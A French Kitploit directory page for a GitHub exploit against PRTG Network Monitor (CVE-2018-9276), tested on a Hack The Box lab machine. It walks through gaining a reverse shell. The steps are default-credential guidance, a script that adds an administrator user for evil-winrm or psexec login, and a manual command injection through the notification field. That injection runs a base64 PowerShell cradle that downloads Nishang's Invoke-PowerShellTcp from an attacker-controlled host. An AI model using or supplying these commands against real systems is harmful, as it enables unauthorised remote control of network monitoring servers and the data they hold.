Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2018-9276 — CVE-2018-9276 PRTG < 18.2.39 Reverse Shell (support Python3) | Kitploit
Outils/GitHubGitHub/alvinsmith-eroad/cve-2018-9276
Génération de PayloadsExploitationMouvement LatéralExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleOutil d'Accès à Distance
GitHubalvinsmith-eroad/cve-2018-9276

CVE-2018-9276

CVE-2018-9276 PRTG < 18.2.39 Reverse Shell (support Python3)

Voir le dépôt
2il y a 5 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2018-9276

CVE-2018-9276 PRTG < 18.2.39 Reverse Shell (support Python3)

Dépendances

  • Impacket (version python3)
  • Netcat
  • Msfvenom

Utilisation

root@kitploit:~
git clone https://github.com/A1vinSmith/CVE-2018-9276.git

./exploit.py -i targetIP -p targetPort --lhost hostIP --lport hostPort --user user --password pass
  1. Les identifiants sont nécessaires pour exécuter l'exploit. Essayez les identifiants par défaut prtgadmin:prtgadmin. Il peut également être utile de consulter la base de données ou les journaux pour les obtenir. https://kb.paessler.com/en/topic/463-how-and-where-does-prtg-store-its-data
  2. Essayez --lport 445 si le port n'est pas déjà occupé.
  3. Il y a quelques commentaires alambiqués dans le code. Ils peuvent nécessiter quelques modifications.
  4. Plusieurs tentatives peuvent être nécessaires pour réussir. Redémarrer la machine cible est toujours une bonne option, surtout lorsque votre charge utile a un impact.

Couverture de test

HTB Netmon box

root@kitploit:~
OS Name:                   Microsoft Windows Server 2016 Standard
OS Version:                10.0.14393 N/A Build 14393
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00376-30821-30176-AA362
Original Install Date:     2/3/2019, 7:05:45 AM
System Boot Time:          7/28/2021, 9:02:41 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC

Crédit

Un grand merci à wildkindcc pour sa version python2 https://github.com/wildkindcc/CVE-2018-9276

Pour aller plus loin

Utilisation de metasploit

https://www.rapid7.com/db/modules/exploit/windows/http/prtg_authenticated_rce/

Exécution de code à distance

https://www.exploit-db.com/exploits/46527

https://github.com/chcx/PRTG-Network-Monitor-RCE

Exemple d'utilisation

Les identifiants sont nécessaires pour exécuter l'exploit. Connectez-vous d'abord et récupérez le cookie authentifié pour ajouter un nouvel utilisateur.

root@kitploit:~
./prtg-exploit.sh -u http://10.10.10.10 -c "OCTOPUS1813713946=XXX"

// Login as the new user via evil-winrm
evil-winrm -i 10.10.10.10 -u pentest -p 'P3nT3st!'
// or alternative psexec.py
python3 /path/etc/impacket/examples/psexec.py pentest:'P3nT3st!'@10.10.10.10

Screen Shot 2021-07-29 at 3 14 10 PM

Exploitation manuelle avancée sans ajout d'utilisateur

Crédit au writeup officiel de HTB
POC: https://www.codewatch.org/blog/?p=453 Plus utiliser SMB pour obtenir un reverse shell https://github.com/A1vinSmith/OSCP-PWK/wiki/Samba-SMB

Si nous ne voulons pas ajouter d'utilisateur, pour un meilleur OPSEC, nous pouvons obtenir un reverse shell. Cependant, en raison de l'encodage HTML, de nombreux caractères sont encodés. Nous pouvons contourner cela en utilisant l'exécution PowerShell en base64. Nous devons créer une commande encodée en base64. Cependant, elle doit être dans l'encodage utilisé par Windows, c'est-à-dire UTF-16LE.

root@kitploit:~
❯ echo -n "IEX(new-object net.webclient).downloadstring('http://10.10.10.100/Invoke-PowerShellTcp.ps1' )" | iconv -t UTF-16LE | base64 -w0

SQBFAFgAKABu...SNIP...HMAMQAnACAAKQA= 

Nous utilisons iconv pour le convertir dans l'encodage cible et exécuterons ce reverse shell à partir de Nishang. https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1

Téléchargez le script et ajoutez la commande en écho à la dernière ligne.

root@kitploit:~
wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1

echo 'Invoke-PowerShellTcp -Reverse -IPAddress 10.10.10.100 -Port 4444' >> Invoke-PowerShellTcp.ps1

Maintenant, démarrez un simple serveur HTTP et créez une nouvelle notification.

root@kitploit:~
python3 -m http.server 80

Cliquez sur Setup > Account Settings > Notifications -> cliquez sur « Add new notification » à l'extrême droite. Déclenchez la notification en cliquant sur le bouton en forme de cloche.

root@kitploit:~
abc.txt | powershell -enc SQBFAFgAKABu...SNIP...HMAMQAnACAAKQA= 

Screen Shot 2021-07-29 at 4 08 01 PM

Télécharger l’outil